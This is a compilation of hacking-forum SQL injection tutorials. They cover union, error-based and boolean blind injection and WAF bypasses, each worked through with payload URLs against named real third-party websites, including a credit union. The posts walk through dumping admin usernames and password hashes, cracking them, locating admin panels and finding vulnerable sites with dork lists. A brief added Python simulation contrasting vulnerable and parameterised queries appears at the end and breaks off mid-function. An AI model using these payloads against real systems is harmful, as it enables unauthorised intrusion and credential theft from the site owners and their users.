www.site.com/dork.php?id=null'+union+select+1,2,substring(username,1,1)+from+admin-- x

Error Based:
Code:
www.site.com/dork.php?id=5+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(username,1,1))+as+char),0x7e))+from+admin+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)

Concat & Limit
On some sites group_concat(), concat() or concat_ws() won't work (a very old MySQL, or a filter in front of it), and even where group_concat() does work its output is cut off at group_concat_max_len, which is 1024 characters by default, so a long table list comes back truncated. Either way, the fallback is limit: walk the rows one at a time.

Let's say our table name is admin, and we get an error when we try something like...

Code:
www.site.com/dork.php?id=null+union+select+1,2,group_concat(table_name,0x0a),4,5+from+information_schema.tables+where+table_schema=database()--

"Function group_concat does not exist in blahblahblah".

Instead, we use limit with concat, or just table_name on its own, and take the rows one by one.

Code:
www.site.com/dork.php?id=null+union+select+1,2,table_name,4,5+from+information_schema.tables+where+table_schema=database()+limit+0,1--

That gives us the first table name; limit+1,1 gives the second, and so on.

Like & Between

Is the WAF getting on your nerves when you try to use =?
You can use other keywords to get around it.

Let's say our table name is admin, and we're trying to match on it to get at its columns.

Code:
www.site.com/dork.php?id=null+union+select+1,2,/*!concat*/(table_name),4,5+from+/*!information_schema*/.tables+/*!where*/+table_name=0x61646d696e--

We get a 403/406 from the WAF. We can use LIKE instead of =.

Code:
www.site.com/dork.php?id=null+union+select+1,2,/*!concat*/(table_name),4,5+from+/*!information_schema*/.tables+/*!where*/+table_name+like+0x61646d696e--

You can also use BETWEEN, giving the same value as both bounds (between+0x61646d696e+and+0x61646d696e); it matches exactly the same rows.

Well, I'll be updating this once I think of more things to add.
Please leave a comment if you learned something or liked it, thanks a lot!

Special shoutout to a few members in this section:
benzi
kobez
webb
zerofreak
neogoo123
Hooded Robin
Zer0Pwn
๖ۣۜΗ α x O r ♥ & Team Intra
The Eminence Help Desk
.bLaZeD
Awakened

Sorry if I missed a few of you guys, Merry Christmas everyone, hope you're having a wonderful time.

PS: Woot, 1337 posts!

-DownFall


[Help] Advanced WAF [Blind Injection]

I tried guessing a few column names from the admin table, but had no luck. I counted the columns, there are 81, and I can't be fucked to get the column names letter by letter for the whole site.

So here's my syntax; it blocks table_name. If I can get around it, it would save me about 10 hours of time lol.

Here's my syntax. I tried a few comment tricks and a few other things, no luck.

Code:
www.natalpress.com.br/humor.php?id=7775+and+ascii(substring((select concat(column_name)+from+information_schema.columns+where+table_name=0x61646d696e+limit+0,1),1,1))>0


[Detailed] Boolean Based Blind Injection [Tutorial]

Introduction

A lot of people think blind injection means having to guess everything. It's called blind injection because no data from the query is visible on the page; the only thing you see is whether the page looks normal or not.

Remember, whenever you're injecting a site, as long as information_schema exists (MySQL version 5 or later) you can use it to read data out of the page without guessing: table names, database names, columns, and all the rest.


Here's a quick tutorial on getting data with blind injection on version 5 or above, without guessing the outcome.

If you want to read up on some basic blind injection, you can check out this tutorial here.

I'll be using this site as an example.

Getting The Version

Code:
http://cathedralhillpress.com/book.php?id=1

Let's start by checking the version, to confirm it's MySQL 5 or later so information_schema is available to us.

Code:
http://cathedralhillpress.com/book.php?id=1 and substring(version(),1,1)=5

It loads fine; now let's replace the 5 with a 4 to double check.

Code:
http://cathedralhillpress.com/book.php?id=1 and substring(version(),1,1)=4

As you can see, a huge chunk of text and pictures is now missing from the page. A false condition gives a visibly different response, and that difference is the signal we'll use for every test below.

Getting The Table Names

Now let's get the first character of the first table name in our database.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))>0

The page loaded fine, so we know the first character's ASCII value is more than 0.

So we raise the threshold until we get close to the right value.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))>75

We know it's more than 75, so let's go up a little more.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))>80

Now we get our error, so the value is somewhere from 76 to 80. Let's switch from "greater than" to "equals" to pin down the exact value.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))=76

We get our error, so let's go up.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))=77

Another error, let's go up again.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))=78

And now it loads fine, so let's look up 78 in the ASCII table.

You can check that here, by looking at the ASCII table.
ASCII Table

78 is "N".

Now we know our first letter is N, so let's get the next one by changing the position argument of substring() from 1 to 2.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),2,1))>100

We know it's more than 100, so let's go up to 101.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),2,1))>101

We get our error. If the value is greater than 100 but not greater than 101, it has to be 101.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),2,1))=101

And it loads fine...Now convert the ascii value of 101 to text. It comes back to "e".

So far we have "Ne"

Now you can either keep getting the returned values, or try and guess the table name. It looks like News, so let's get our next character and guess.

The ASCII value of "w" is 119, so let's see if that comes back true.


Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),3,1))=119

It loads fine, so now we have "New".

Lets check the last one...

The value of "s" is 115, so let's guess again.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),4,1))=115

Now we have our "News" table, but how do we know whether there are more characters? In MySQL, substring() past the end of a string returns an empty string, and ascii('') is 0. So we check whether the 5th character's ASCII value is > 0; if it isn't, there is no 5th character.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1),5,1))>0

And the page loads with the error, so the table name is exactly four characters: News.

Getting The Column Names

Getting the columns is fairly similar to getting the table names: you add a where clause on table_name, and you write the table name as a hex literal (0x4e657773 is "News") so that no quotes are needed in the URL.

Let's see if our table even has columns first.

Code:
cathedralhillpress.com/book.php?id=1+and+ascii(substring((select+concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+limit+0,1),1,1))>0

Page loads fine, so we have a first character whose value is more than 0. Now let's get the column name.

Code:
cathedralhillpress.com/book.php?id=1+and+ascii(substring((select+concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+limit+0,1),1,1))>100

No errors, let's go up.

Code:
cathedralhillpress.com/book.php?id=1+and+ascii(substring((select+concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+limit+0,1),1,1))>105

Error, so it's between 101 and 105. Try the top of the range first.

Code:
cathedralhillpress.com/book.php?id=1+and+ascii(substring((select+concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+limit+0,1),1,1))=105

Loads fine, the value of 105 is "i".

Then we repeat the process, until we get our next character.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select+concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+limit+0,1),2,1))>95

No error, let's try 100.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select+concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+limit+0,1),2,1))>100

Error, let's see if it = 100.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select+concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+limit+0,1),2,1))=100

No error, so now we have "id". There's your first column. To get the next one, increase the limit offset (limit 1,1) and start your substring() position over at 1.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select+concat(column_name)+from+information_schema.columns+where+table_name=0x4e657773+limit+1,1),1,1))>0

Getting Data Out Of Columns

It's the same process, except we put our column names in a concat statement and select FROM the table name.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),1,1))>0

So let's get our first character..

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),1,1))>45

No error, let's go up.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),1,1))>50

Error, go back down until you find the right one.

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),1,1))=49

Loads fine, and the ascii value of 49 comes back to "1".

Now let's check if there's a second character..

Code:
http://cathedralhillpress.com/book.php?id=1+and+ascii(substring((select concat(id)+from+News+limit+0,1),2,1))>0

We get the error, so our first result is just "1".

Conclusion

As you can see, "blind injection" doesn't really have to do with guessing, as long as the server exposes information_schema (MySQL 5.0 and later). The correct term is "Boolean-based blind injection": every request asks a true/false question, and the page either loads normally (true) or loads with the error (false). Because ASCII values are ordered, you can also halve the range on each request (>64, then >96 or >32, and so on) instead of stepping by one; that pins a character down in about seven requests.


Well guys, that's it. Hope you understand, let me know if you need anything.

-DownFall

[TUT] SQL Injection(Pics) [Highly Detailed] [10K+ Views]

I won't go into detail on what SQLi is, you can google that for yourself.

Starting Off
First off, you need to find a vulnerable site. Easy ways to find vulnerable sites are to use Google dorks or to use a list of sites.
Here's a list of each.
Google Dorks
Vulnerable Sites #1
Vulnerable Sites #2
Vulnerable Sites #3

Vulnerable Sites (With Syntax)
Once you have a candidate site, test whether you can inject by adding a ' to the end of the URL.
I'll be using this site
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=12

As you can see, it loads perfectly fine, with no error. Now to see if it's vulnerable, add a ' to the end, so it should look like this.
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=12'
Now you should get a MySQL syntax error ("You have an error in your SQL syntax...") instead of the page.

Finding The Amount Of Columns
Now that you have found a vulnerable site, you need to find the number of columns the query returns.
You can do this with the ORDER BY clause: ORDER BY n sorts by the nth column, so it errors as soon as n is bigger than the column count. We'll start by guessing 5.
So take your URL, remove the ' from the end of it, and add +order+by+5-- (if the bare -- doesn't work, use --+ or -- -, because MySQL only treats -- as a comment when a space follows it).
Your link should now look like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=12+order+by+5--
As you can see, it loads perfectly fine, so increase the number until you get an error that says "Unknown column '(number)' in 'order clause'".
It looks like this:
So now that you have your error, decrease the number until you get a perfectly loaded page again.
I got the error at
Code:
+order+by+14--
so I'm going to try
Code:
+order+by+13--

So my link looks like this now, and loads perfectly fine.
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=12+order+by+13--

Finding Vulnerable Columns
So now that you have the number of columns, you want to see which of them are displayed on the page.
You do this with UNION SELECT (or UNION ALL SELECT). First, add a - in front of your ID number, so that the original query matches no row and only the UNION's row gets displayed.
It should look like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=-12
Or you can change the number to null, which also makes the original query return no row.
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null
Then add +union+select+1,2,...,N-- with one number per column (N being your column count). The numbers that show up on the page tell you which columns are displayed.
My link now looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--

Now the site looks like this: the numbers 2, 3 and 4 appear on the page, so those are the columns whose values get displayed (the "vulnerable" columns).

Getting MySQL Version
First off, we want it to be 5 or more, because information_schema (used below to list tables and columns) only exists from MySQL 5.0 on. If it's older than 5, you have to guess table and column names instead (not covered in this post).
So pick one of your vulnerable columns, and replace it with either:
Code:
@@version
Or
Code:
version()
I'm gonna use column 2, so now my link looks like this..
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+Select+1,@@Version,3,4,5,6,7,8,9,10,11,12,13--
And my page looks like this..

Getting Table Names
Now that we have our version, we want the tables in the current database.
For that we need three pieces of syntax.
Code:
group_concat(table_name)
Code:
from+information_schema.tables
Code:
+where+table_schema=database()--

So pick a vulnerable column and replace it with group_concat(table_name).
Then add +from+information_schema.tables after your column list, and +where+table_schema=database()-- so you only get the current database's tables.
Your link should look something like this.
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+Select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=database()--
And your site should now display the tables from the database.

As you can see, the names all run together. To fix that, add 0x0a (hex for a newline) as a second argument to group_concat, so each table name lands on its own line.
So my link looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+Select+1,group_concat(table_name,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_schema=database()--
And now the output is readable.
As you can see, we have a table called users, and that's what we want.

Getting Columns Out Of Tables
To do this, we use a few more pieces of syntax, similar to finding tables.
Code:
group_concat(column_name)
Code:
information_schema.columns
Code:
where+table_name="TABLE NAME HERE"

So now my link looks like this...
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+Select+1,group_concat(column_name,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name="users"--
Unfortunately, we get an error: the quotes around the table name get escaped by the application (magic quotes / addslashes), which breaks the query. To get around this, write the table name without quotes, as char() codes or as a hex literal.
The ASCII values of "users" look like this:
Code:
char(117,115,101,114,115)
(0x7573657273, the hex of "users", works the same way.) You can look the values up in an ASCII table.

So now my link looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,group_concat(column_name,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+information_schema.columns+where+table_name=char(117,115,101,114,115)--
And the site looks like this:
As you can see, we have some important columns there; now we want to get the data from them.

Getting Data From Columns
Ok, so I see ID, username, and password, and that's what I want.
Now, we just replace a few things.
Code:
group_concat(ID,0x3a,username,0x3a,password,0x0a)
Code:
from+Table Name Here
My link now looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,group_concat(ID,0x3a,username,0x3a,password,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+users--

So lets break that down a bit...
The 0x0a means New Line, as I said earlier, and 0x3a means colon.
So I added 0x3a after ID, and username, so it should look something like this.

ID:Username:Password

Instead of using +from+information_schema.tables or +from+information_schema.columns, we just want it from the users table.

So we do +from+users--

So, my finished link looks like this:
Code:
http://www.bcdcreditunion.co.uk/news/story.php?ID=null+union+select+1,group_concat(ID,0x3a,username,0x3a,password,0x0a),3,4,5,6,7,8,9,10,11,12,13+from+users--

And finally, the site looks like this:

Getting Data From Multiple Databases

I'll be using this link as an example.
Code:
http://www.hubbardbrook.org/people/view.php?id=109'

Once you have your column count and your vulnerable columns, you want to get the names of the databases.
You can do that by using:
Code:
group_concat(schema_name)
&
Code:
from information_schema.schemata

So my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.schemata--

Now I see that there are 2 different databases, one called "hbr" and one called "mysql". Now we want to see which one is the default, or current one. First write those down in notepad or something.

To find out, you pick your column, and use:
Code:
database()
So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--

Now where column 4 was (my vulnerable column), we can see "hbr". So we know that's the current database. Now of course, you'd want to search through it to find your tables to see if you can find some login info. You would get the tables the normal way:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=database()--

There's over 100 tables, but I didn't see anything that resembled user info, so now we check the other database. It's almost the same thing as finding the default tables. My other database name was called "mysql".
To get the tables of that, we convert it to hex, and use:
Code:
where+table_schema=0xdatabasehexhere
So the hex of "mysql" is 6d7973716c
Make sure you always add 0x in front of your hex.
Now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.tables+where+table_schema=0x6d7973716c--

Now we have the tables from the second database, and we can see that there's a table named user!

Now we get the columns of the user table. Keep the table_schema condition for that database, so a same-named table in another database doesn't get mixed in. So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572--

0x75736572 is the hex of "user". So what I did was convert the table name to hex and pull its columns from information_schema.columns.
Now we want the data from the columns. It's still almost the same, except for the very last bit.
There are 2 columns named "User" and "Password", which is what we want.
So build your group_concat as before, but at the end the syntax is:
Code:
+from+databasename.tablename
So now my link looks like this:
Code:
http://www.hubbardbrook.org/people/view.php?id=-109+union+select+1,2,3,group_concat(User,0x3a,Password,0x0a),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+mysql.user--

And as you can see, there are now logins where your column name was.

Conclusion
As you can see, there's a username called admin. Now you can say to yourself "Fuck yeah, I got your login".
Hold up, it's not that easy. Almost every time, the passwords are stored in a transformed form: usually a hash (MD5, SHA1, or MySQL's own PASSWORD() format in mysql.user), occasionally just an encoding like Base64.

You can attempt to crack them using a few sites; here are the ones that I use.
MD5Decrypter
HashChecker

Now you need to find the admin control panel, where you can log in and do what you want.
Here are some online ones that I use.
OutLaws Admin Finder
Admin Page Finder

Havij also has a password cracker and an admin page finder.

String Based Injection

Is order by not working? Here's your solution.

Example:
Code:
www.site.com/dork.php?id=5+order+by+100--
You still get no error, which is highly unlikely to be real: some sites do have a large number of columns, but it's usually not over 50. What's happening is that the parameter sits inside quotes in the query (WHERE id='5 order by 100--'), so your order by is just part of a string.

To fix that, add a ' after your id to close the string, and +- at the end of your syntax so the comment has a space after it.
Example:
Code:
www.site.com/dork.php?id=5'+order+by+100--+-

Now you should get your error. Continue with union select the way I explained previously, keeping the ' and the --+-.

WAF Bypassing

WAF stands for web application firewall: a filter in front of the site that inspects requests and blocks the ones that look like attacks.

Most web application firewalls block requests that contain certain SQL keywords.
Here are a few.

Code:
union
select
from
information_schema
concat
group_concat
where
and
@@version

How do you know if a firewall is installed?
Usually when you're trying to use the union select command, you'll get an error that says something like this.

Code:
Forbidden

You don't have permission to access /index.php on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

I'll use this site as an example.
Code:
http://www.timberwatch.org.za

After a bit, I found the site has 15 columns, so now I want to use union select to find the vulnerable ones.

When I tried it, I got my error.
Code:
http://www.timberwatch.org.za/index.php?id=-49+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

To bypass these, wrap the blocked keywords in MySQL's versioned comment syntax. Anything inside /*! ... */ looks like a comment to other databases and to many filters, but MySQL executes it.

Code:
/*!*/

Examples:
Code:
/*!union*/
/*!select*/
/*!from*/
/*!information_schema*/
/*!concat*/
/*!group_concat*/
/*!where*/
/*!and*/
version()

Blocked:
Code:
http://www.timberwatch.org.za/index.php?id=-49+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

Bypassed:
Code:
http://www.timberwatch.org.za/index.php?id=-49+/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

Blocked:
Code:
http://www.timberwatch.org.za/index.php?id=-49+/*!union*/+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15--

Bypassed:
Code:
http://www.timberwatch.org.za/index.php?id=-49+/*!union*/+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--

Concat and the Limit Function

WAF has group_concat blocked? Use concat with LIMIT instead.

LIMIT also gets around the length cap: group_concat() output is truncated at group_concat_max_len (1024 bytes by default), so a long list of tables won't all show. With concat() and LIMIT offset,1 you fetch one row per request instead.

You change

Code:
group_concat(table_name)
to
Code:
concat(table_name)
Of course, adding this at the end.
Code:
limit 0,1--

That shows the first table, and the first table only.
To show the next table, change the 0 to 1.
Code:
limit 1,1--

Then keep increasing until you find the table you want. When the page comes back with nothing in your column, you've gone past the last table.

Blind Injection (Advanced)

Blind injection is harder than the other types; it requires skill and patience. To check for a vulnerability, you go by true and false statements: if the page is unchanged for a true statement but something is missing (pictures, videos, words, content) for a false one, it's vulnerable.

Example:
Code:
www.site.com/dork.php?id=10+and+1=1

1 is equal to one, so that statement is true.

Code:
www.site.com/dork.php?id=10+and+1=2

1 doesn't equal 2, so this should return false. Now check and see if anything is missing.

Getting the Database Version

You can't see the version, so you guess it and use substring() to check whether the guess is true or false.

Code:
www.site.com/dork.php?id=10+and+substring(version(),1,1)=5

If that returns true (nothing missing from the page), your version starts with 5. If not, check 4 the same way by replacing the 5 with a 4.

Code:
www.site.com/dork.php?id=10+and+substring(version(),1,1)=4

Getting the Table Names

You have to guess the table names, just like everything else.

Code:
www.site.com/dork.php?id=10+and+(select+1+from+admin)=1

If this returns true (nothing missing from the page), the admin table exists. Add +limit+0,1 inside the subquery if the table might hold more than one row: a subquery compared with = must return a single row, otherwise MySQL errors and the result looks like false.

Here are some common table names.
Code:
admin
admins
tbl_admin
tbladmin
member
members
tbl_members
tblmembers
user
users
tbl_users
tblusers
wp_users

Getting the Column Names

After you have your table name, you have to guess the columns.
Code:
www.site.com/dork.php?id=10+and+(select+substring(concat(1,admin_id,0x3a,admin_login,0x3a,admin_pass),1,1)+from+admin+limit+0,1)=1

If you get an error, one of the columns doesn't exist, so try them one by one and guess until you get the right one (nothing missing from the page). The concat(1,...) prefix makes the first character "1" whatever the data is, so the =1 test only fails when a column name is wrong.

Here are some common column names.

Code:
id
user_id
username
user
password
pass
passwd
pword
pwd
user_password
user_login
login

Getting Data From Your Columns

After you have the table and columns, you find each character's ASCII value by comparison, then move on to the next one.

Code:
http://www.site.com/dork.php?id=10+and+ascii(substring((select concat(admin_id,0x3a,admin_login,0x3a,admin_pass)+from+admin+limit+0,1),1,1))>100

If nothing is missing from the page, the first character's ASCII value is greater than 100. If you get the error, it is 100 or less, so adjust the number until you have narrowed it down to one value.

To get the next character, change the position argument of substring() from 1 to 2, the same way you stepped the LIMIT offset earlier.

Code:
http://www.site.com/dork.php?id=10+and+ascii(substring((select concat(admin_id,0x3a,admin_login,0x3a,admin_pass)+from+admin+limit+0,1),2,1))>100

You do that until you have all of your characters. You can tell you're past the last character when >0 returns false, because ascii() of the empty string is 0.

Code:
http://www.site.com/dork.php?id=10+and+ascii(substring((select concat(admin_id,0x3a,admin_login,0x3a,admin_pass)+from+admin+limit+0,1),2,1))>0

Here's a site you can use to convert ASCII values to text.

ASCII Table

Well, hope you guys understood everything. PM me or post here if you have any questions, and I'll get back to you asap.

Credits
kobez - Dork List
DAN_UK - Hash cracking sites.

PM me if you need help with anything.

SQL Injection Tutorial (MySQL)

I did not make this; I found it. OK, so here it goes.


In this tutorial I will describe how SQL injection works and how to use it to get some useful information.

First of all: What is SQL injection?
It's one of the most common vulnerabilities in web applications today.
It allows an attacker to execute database queries through the URL and gain access
to confidential information etc. (in short).

1. SQL Injection (classic, or error based, or whatever you call it)
2. Blind SQL Injection (the harder part)

So let’s start with some action

1). Check for vulnerability
Let's say that we have some site like this
http://www.site.com/news.php?id=5
Now to test whether it is vulnerable we add a ' (quote) to the end of the URL,
which gives http://www.site.com/news.php?id=5'
so if we get an error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar
that means it is vulnerable to SQL injection

2). Find the number of columns
To find the number of columns we use the ORDER BY clause (it tells the database how to order the result).
So how do we use it? We just increment the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get a message like Unknown column '4' in 'order clause' or something like that)
that means it has 3 columns, because we got an error on 4.

3). Check for UNION
With UNION we can select more data in one SQL statement.
so we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found in step 2 that the number of columns is 3)
if we see some numbers on the screen, i.e. 1 or 2 or 3, then the UNION works

4). Check for MySQL version
http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* is not working or you get some error, then try --
it's a comment and it's important for our query to work properly.
let's say that we have the number 2 on the screen; now to check the version
we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.
it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
i didn't see any paper covering this problem, so i must write it
what we need is the convert() function
i.e.
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()
i.e.
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
and you will get the MySQL version

5). Getting table and column names
well, if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) <-- later I will describe MySQL 5 and later.
we must guess table and column names in most cases.
common table names are: user/s, admin/s, member/s ...
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...
i.e. it would be
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see the number 2 on the screen like before, and that's good :D)
we know that the table admin exists...
now to check column names.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try another column name)
we get the username displayed on screen, for example admin, or superadmin etc...
now to check if the column password exists
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try another column name)
we see the password on the screen as a hash or in plain text; it depends on how the database is set up
i.e. md5 hash, mysql hash, sha1...
now we must complete the query to look nice
for that we can use the concat() function (it joins strings)
i.e.
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that I put 0x3a, the hex value for : (so 0x3a is the hex value for a colon)
(there is another way for that, char(58), the ASCII value for : )
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
now we get username:password displayed on screen, i.e. admin:admin or admin:somehash
when you have this, you can log in as admin or some superuser
if you can't guess the right table name, you can always try mysql.user (default)
it has user and password columns, so the example would be
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5
Like I said before, I'm gonna explain how to get table and column names
in MySQL 5 and later.
For this we need information_schema. It holds the names of all tables and columns in the database.
to get tables we use table_name and information_schema.tables.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
here we replace our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of the query to list the tables one by one.
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
note that i put 0,1 (get 1 result starting from the 0th)
now to view the second table, we change limit 0,1 to limit 1,1
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table is displayed.
for third table we put limit 2,1
i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc...
To get the column names the method is the same.
here we use column_name and information_schema.columns
the method is same as above so example would be
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
the first column is displayed.
the second one (we change limit 0,1 to limit 1,1)
ie.
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
the second column is displayed, so keep incrementing until you get something like
username,user,login, password, pass, passwd etc…
if you wanna display column names for specific table use this query. (where clause)
let’s say that we found table users.
i.e
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
now we get a column name from table users displayed. Just using LIMIT we can list all columns in table users.
Note that this won't work if magic_quotes_gpc is ON, because the quotes get escaped; write the table name as hex (0x7573657273) or with char() instead.
let's say that we found the columns user, pass and email.
now to complete query to put them all together
for that we use concat() , i decribe it earlier.
i.e
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*
what we get here is user:pass:email from table users.
example: admin:hash:whatever@blabla.com
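The classic sequence just described (quote test, ORDER BY column count, UNION SELECT markers, version, table list, dump), and the same sequence in the [TUT] SQL Injection post earlier on this page, can be seen end to end, together with what parameter binding does to it, in the following added example. It is not code from either tutorial: it simulates story.php?ID=... against an in-memory SQLite database with a constructed story table and a constructed users table (the rows and the hash value are made up). The vulnerable handler pastes the parameter into the query exactly as these tutorials' targets do; the fixed handler binds it. SQLite stands in for MySQL, so sqlite_version() replaces @@version, sqlite_master replaces information_schema.tables, and group_concat(a || ':' || b, char(10)) replaces group_concat(a,0x3a,b,0x0a).

```python
import sqlite3


def build_db():
    """Constructed sample schema standing in for the target's database (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE story (ID INTEGER PRIMARY KEY, headline TEXT, body TEXT);
        INSERT INTO story VALUES (12, 'Branch opening hours', 'Open late on Thursdays.');
        CREATE TABLE users (ID INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def story_page_vulnerable(conn, id_param):
    """story.php?ID=... as the tutorials' targets behave: the parameter becomes SQL."""
    sql = f"SELECT ID, headline, body FROM story WHERE ID = {id_param}"
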